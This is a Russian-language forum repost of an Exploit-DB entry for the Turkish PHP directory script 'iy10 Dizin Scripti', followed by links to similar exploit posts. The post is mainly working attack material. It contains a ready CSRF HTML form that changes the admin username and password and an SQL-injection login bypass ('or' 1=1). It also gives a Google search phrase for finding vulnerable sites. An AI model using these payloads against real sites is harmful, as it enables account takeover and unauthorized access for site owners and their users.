Exploit iy10 Dizin Scripti - Multiple Vulnerabilities

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
38927
Проверка EDB
  1. Пройдено
Автор
KNOCKOUT
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2015-12-10
iy10 Dizin Scripti - Multiple Vulnerabilities
Код: 
                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \  
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____ 
                       /_______  //_______  / \______  /
                               \/         \/         \/           
iy10 Dizin Scripti   => Multiple Vulnerabilities (CSRF & Authentication Bypass)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
[~] Åžeker Insanlar :  ZoRLu, ( milw00rm.com ), 
                      Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
					  KedAns-Dz, b3mb4m
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : iy10 Dizin Scripti
|~Affected Version : All Version 
|~Software  : http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html
|~RISK : High
|~Google Keyword :  "Sitenizi dizine eklemek için tıklayın !"

################## ++ CSRF Admin Password Change Exploit ++ ######################################

<html>
  <body>
    <form action="http://[TARGET]/admin/kullaniciayarlar.php" method="POST">
      <input type="hidden" name="kullaniciadi" value="knockout" />
      <input type="hidden" name="sifre" value="password" />
      <input type="hidden" name="Submit" value="Exploit!" />
	  <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

################# ++ SQL Injection with Authentication Bypass ++###########################################

http://[TARGET]/admin 
ID: 'or' 1=1
PW : 'or' 1=1

############################################################
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Jettweb PHP Hazır Haber Sitesi Scripti V2 - SQL Injection (Authentication Bypass)
Ответы
0
Просмотры
631
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Jettweb PHP Hazır Haber Sitesi Scripti V3 - SQL Injection
Ответы
0
Просмотры
622
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Duyuru Scripti - 'Goster.asp' SQL Injection
Ответы
0
Просмотры
382
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit TPO Duyuru Scripti - Insecure Cookie Authentication Bypass
Ответы
0
Просмотры
371
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Ataccan E-Ticaret Scripti - 'id' SQL Injection
Ответы
0
Просмотры
343
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Site Tanitimlari Scripti - Multiple SQL Injections
Ответы
0
Просмотры
312
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Makale Scripti - Cross-Site Scripting
Ответы
0
Просмотры
318
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Al Sat Scripti - Database Disclosure
Ответы
0
Просмотры
293
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Netkamp Emlak Scripti - Multiple Input Validation Vulnerabilities
Ответы
0
Просмотры
295
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Alisveris Sitesi Scripti - 'index.asp' Cross-Site Scripting
Ответы
0
Просмотры
289
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу